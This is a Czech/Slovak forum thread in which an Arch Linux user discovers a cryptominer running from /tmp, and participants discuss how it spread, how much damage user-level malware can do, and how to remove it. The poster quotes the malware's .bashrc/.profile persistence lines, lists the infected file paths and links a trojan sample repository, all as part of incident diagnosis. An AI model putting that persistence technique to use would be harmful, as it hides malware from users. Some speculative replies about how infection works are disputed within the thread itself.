Podivný proces (initctl) v /tmp

j

Podivný proces (initctl) v /tmp
« kdy: 27. 08. 2018, 17:15:35 »
dnes som si nahodou vo vystupe htop vsimol proces, ktory zral 100 % cpu. podivny bol jeho nazov: /tmp/F441-D751-2188-F374/initctl. velkost 2492 kB a vo vnutri retazec GCC (Ubuntu 6.4.0-8ubuntu1). nakolko bezim na archu, vacsinu veci kompilujem, zacinal som mat zle tusenie.

vo vystupe lsof sa objavila takyto zaznam:

Kód: [Vybrat]
.. TCP mypc:42454->100.ip-142-44-242.net:14444 (ESTABLISHED)
spustil som teda tcpdump:

Kód: [Vybrat]
100.ip-142-44-242.net.14444 -> mypc.42454 {"jsonrpc":"2.0","method":"job","params":{"blob":"0707f..

Podla googlu to vyzera na nejaky kryptominer. Preventivne som odpojil PC od netu, kazdopadne ostava viacero otazok:
  • ako som sa nakazil?
  • co je vsetko kompromitovane?
  • ako sa nakazy zbavit?

budem vdacny za kazdu radu. arch linux, 64bit.

j
« Poslední změna: 27. 08. 2018, 20:28:56 od Petr Krčmář »


samalama

Re:podivny proces (initctl) v /tmp
« Odpověď #1 kdy: 27. 08. 2018, 18:44:49 »
pod akym userom to bezalo/kto je vlastnikom suboru?

kkt1

  • *****
  • 796
    • Zobrazit profil
Re:podivny proces (initctl) v /tmp
« Odpověď #2 kdy: 27. 08. 2018, 19:10:20 »
Jak si se nakazil je tezke rict bez logu a ty logy uz nemusi byt validni. Patrne nejaky otevreny port a nejaka zranitelnost. Co vse je kompromitovane? Tezko rict, obecne receno vse. Jak se toho zbavit? Cista instalace a obnova uzivatelskych dat ze zalohy je nejlepsi volba. Nevis co vse je napadene.

Re:podivny proces (initctl) v /tmp
« Odpověď #3 kdy: 27. 08. 2018, 19:12:32 »
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...

To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.

Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.

Re:podivny proces (initctl) v /tmp
« Odpověď #4 kdy: 27. 08. 2018, 21:31:33 »
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód,
Opravdu? Jak je možné v prohlížeči jen tak spustit libovolný kód?

který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root
Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe
Jak router jen tak nakazil počítač v síti? Nejsnáz asi kapénkovou infekcí…

To ale pouze střílím
To je to jediné, s čím se dá souhlasit.


j

Re:Podivný proces (initctl) v /tmp
« Odpověď #5 kdy: 27. 08. 2018, 21:33:04 »
tak nieco sa podarilo zistit. proces bezi pod mojim userom. a vyzera to na https://www.reddit.com/r/linuxmasterrace/comments/8dx7nj/psa_please_check_if/. blbe je, ze aj ked som .desktop subor zmazal, objavil sa (po reboote) v /tmp novy proces. je skratka celkom odolny. nakazil som sa niekedy koncom aprila, co celkom dobre ilustruje aj graf teploty cpu (monitorix) - nakolko aj pri "idle" skocil o 10 stupnov hore.

dakujem za komenty. ked zistim viac, pridam. j

bakakaika

Re:podivny proces (initctl) v /tmp
« Odpověď #6 kdy: 27. 08. 2018, 21:40:43 »

Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné.  Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.

Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.

j

Re:Podivný proces (initctl) v /tmp
« Odpověď #7 kdy: 27. 08. 2018, 21:44:23 »
hmm... tak v .bashrc mam takyto skvost:
linux_bash="$HOME/.ssh/service/ssh-agent"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi


a v .profile pre istotu este raz ale trochu inak:
linux_bash="$HOME/.cache/totem/service/totem-daemon"
if [ -e "$linux_bash" ];then
setsid "$linux_bash" 2>&1 & disown
fi


uz na nete nachadzam k tejto teme celkom dost prispevkov..

j

Re:Podivný proces (initctl) v /tmp
« Odpověď #8 kdy: 27. 08. 2018, 21:58:36 »
a kde vsade sa nas..

$ sudo find ~myuser -size 2227632c
/home/myuser/.local/share/accounts/services/dbus-daemon
/home/myuser/.local/share/icc/icc-daemon
/home/myuser/.cache/totem/service/totem-daemon
/home/myuser/.ssh/service/ssh-agent

j

Re:Podivný proces (initctl) v /tmp
« Odpověď #9 kdy: 27. 08. 2018, 22:04:29 »
a keby sa s tym chcel niekto hrat: https://github.com/Saren-Arterius/dbus-daemon-trojan-sample

akurat premyslam, ci sa to tu spominalo v Postrehoch z bezpecnosti

bakakaika

Re:podivny proces (initctl) v /tmp
« Odpověď #10 kdy: 27. 08. 2018, 22:04:43 »
nakažení linuxu není kupodivu tak složité, za vším hledej prohlížeč, přes ně se spustil kód, který třeba nemusel dělat nic jiného než čekat až se v nějakém terminálu přihlásíš jako root. Nebo klidně ani nemusel potřebovat roota, prostě si vlezl do .bashrc a odtud se spouštěl a těžil. Pokud to nebyl prohlížeč, tak ti někdo kazil router a ten zase nakazil sebe, protože jak to bývá u domácích počítačů, FW není potřeba...

To ale pouze střílím, k přesným závěrům je potřeba bitová kopie disku a dump paměti.

Smaž to a jdi znovu, nebo si začni prohledávat tempy a hledat kudy ten program se mohl někam dostat.
Píšete blbosti, bylo vyvedeno dost úsilí aby někdo nemohl jen tak spustit libovolný kod po navštívení webove stranky. A i pokud mate otevreny port, stale potrebujete něco co na něm poslouchá s nějakou zranitelností, která nebyla patchnuta.

Jinak na webu se píše, že byl nakažený nějaký plugin pro přehrávač na Archu (Kodi), to mi spíš příjde jako rozumný attack vector.

Re:podivny proces (initctl) v /tmp
« Odpověď #11 kdy: 27. 08. 2018, 22:13:16 »
Skodlivy kod behici pod userem je dost pruser
To nezpochybňuju. Jenže AoK se v tom komentáři nedostal ani k tomu. Tam to bylo samé 1. prohlížeč 2. ? 3. průnik nebo 1. uživatelský proces 2. ? 3. root.

Youda

Re:Podivný proces (initctl) v /tmp
« Odpověď #12 kdy: 27. 08. 2018, 23:12:25 »
RHEL defaultne montuje /tmp s noexec flagem, divim se,zeje to jinde jinak.

Youda

Re:podivny proces (initctl) v /tmp
« Odpověď #13 kdy: 27. 08. 2018, 23:16:42 »

Dejme tomu, že by dokázal zjistit, že se v nějakém terminálu přihlásil jako root. A co by ten kód spuštěný pod běžným uživatelem dál dělal? Jak by ovlivnil ten rootovský proces?

Skodlivy kod behici pod userem je dost pruser, muze cist .ssh, zasifrovat dokumenty, měnit PATH, atd. A ono je to jedno, díky neexistující izolaci u X11 může kterákoliv aplikace naslouhat stistky kláves jiné.  Takže tomu procesu staci az nekdo natuka heslo do terminalu a je to.

Bezpečnostní model linuxu byl vymýšlen v osmdesátých letech a v dnešním světě je to katastrofa. Modlim se za flatpack a Wayland.

Selinux, Apparmor a CGroups byly vymyslene v osmdesatkach? To jsem nevedel

Fanda

Re:Podivný proces (initctl) v /tmp
« Odpověď #14 kdy: 27. 08. 2018, 23:26:09 »
To akoze linux este furt nespusta aplikacie v sandboxe a akakolvek derava apka moze kompromitovat cele ~ ? Ze vas to bavi sa hrat s ohnom a este mat reci o nasadeni linux desktopu vo firmach...